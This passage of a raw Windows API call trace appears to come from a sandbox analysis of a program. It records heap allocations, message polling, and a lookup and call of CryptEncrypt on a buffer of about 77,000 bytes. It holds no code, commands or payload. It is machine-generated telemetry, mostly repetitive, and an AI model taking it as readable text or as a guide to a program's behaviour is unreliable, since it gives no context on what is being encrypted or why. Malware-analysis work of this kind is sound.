lpMsg=0x8cf3b8) returned 0 [0211.592] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.592] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0211.592] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.592] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0211.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0211.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0211.592] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.594] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0211.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50ad0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0211.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0211.594] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0211.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0211.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0211.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e54508 [0211.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0211.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0211.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0211.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0211.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0211.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0211.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0211.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0211.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0211.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0211.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0211.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0211.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0211.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0211.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0211.595] CryptEncrypt (in: hKey=0xa87290, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x12cf6, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x12cf8) returned 1 [0211.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0211.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0211.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0211.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0211.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0211.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0211.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0211.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0211.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0211.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0211.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0211.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0211.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0211.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0211.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0211.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0211.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0211.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0211.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0211.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0211.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0211.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0211.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0211.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0211.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0211.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0211.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0211.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0211.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0211.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0211.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0211.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0211.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0211.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0211.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0211.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0211.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0211.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0211.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0211.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0211.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0211.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0211.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0211.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0211.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0211.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0211.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0211.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0211.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0211.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0211.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0211.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0211.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0211.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0211.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0211.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0211.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0211.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0211.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0211.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0211.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0211.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0211.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0211.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0211.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0211.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0211.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0211.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0211.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0211.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0211.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0211.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0211.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0211.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0211.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0211.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0211.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0211.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0211.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0211.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0211.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0211.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0211.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0211.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0211.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0211.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0211.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0211.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0211.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0211.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0211.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0211.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0211.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0211.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0211.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0211.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0211.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0211.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0211.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0211.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0211.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0211.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0211.599] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0211.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0211.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0211.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0211.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0211.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0211.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0211.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0211.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0211.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0211.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0211.599] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0211.599] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0211.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0211.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0211.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0211.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0211.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0211.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0211.600] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0211.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0211.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0211.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0211.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0211.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0211.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0211.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0211.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0211.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0211.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0211.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0211.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0211.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0211.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0211.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0211.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0211.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0211.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0211.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0211.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0211.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0211.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0211.601] CharLowerBuffW (in: lpsz="byte[77048]", cchLength=0xb | out: lpsz="byte[77048]") returned 0xb [0211.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0211.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0211.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0211.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0211.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0211.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0211.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0211.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0211.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0211.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0211.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0211.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0211.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0211.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0211.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0211.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0211.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x12cf8) returned 0x2e93030 [0211.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0211.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0211.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0211.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0211.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0211.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0211.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0211.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0211.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0211.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0211.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0211.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699e8 [0211.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b48 [0211.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0211.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0211.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0211.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0211.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0211.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0211.602] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0211.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0211.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0211.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a48 [0211.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cc8 [0211.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0211.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0211.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0211.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0211.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0211.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0211.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0211.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0211.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0211.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x12cf6) returned 0x2ea5d30 [0211.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0211.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0211.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x12cf6) returned 0x2eb8a30 [0211.606] HeapFree (in: 